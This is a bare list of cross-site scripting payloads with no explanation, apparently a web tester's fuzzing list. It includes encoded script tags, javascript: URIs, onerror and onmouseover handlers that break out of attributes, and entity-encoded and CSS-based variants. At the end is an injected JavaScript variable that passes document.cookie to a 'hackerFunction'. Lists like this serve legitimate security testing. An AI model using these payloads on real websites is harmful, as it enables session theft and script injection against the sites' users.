★~!@#$%^&*()_+<>,./?;'"[]{}-
★%3Cinput /%3E
★%3Cscript%3Ealert('XSS1')%3C/script%3E
★
★
★<input/
★
★
★
★javascript:alert(/xss5/)
★javascript:alert(/xss6/)
★
★
★<img src="#"/**/onerror=alert(/xss9/) width=100>
★=’>
★1.jpg" onmouseover="alert('xss10')
★">
★http://xxx';alert('xss12');var/ a='a
★’”>xss&<
★"onmouseover=alert('hello');"
★&{alert('hello');}
★>"'>
★>%22%27><img%20src%3d%22javascript:alert(%27XSS14%27)%22>
★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS15%26quot;)>
★AK%22%20style%3D%22background:url(javascript:alert(%27XSS16%27))%22%20OS%22
★%22%2Balert(%27XSS17%27)%2B%22
★
★
★
★a?
★<!--'">&:
var from = ‘$!rundata.Parameters.getString(’from’)';
var from = ”;hackerFunction(document.cookie);”;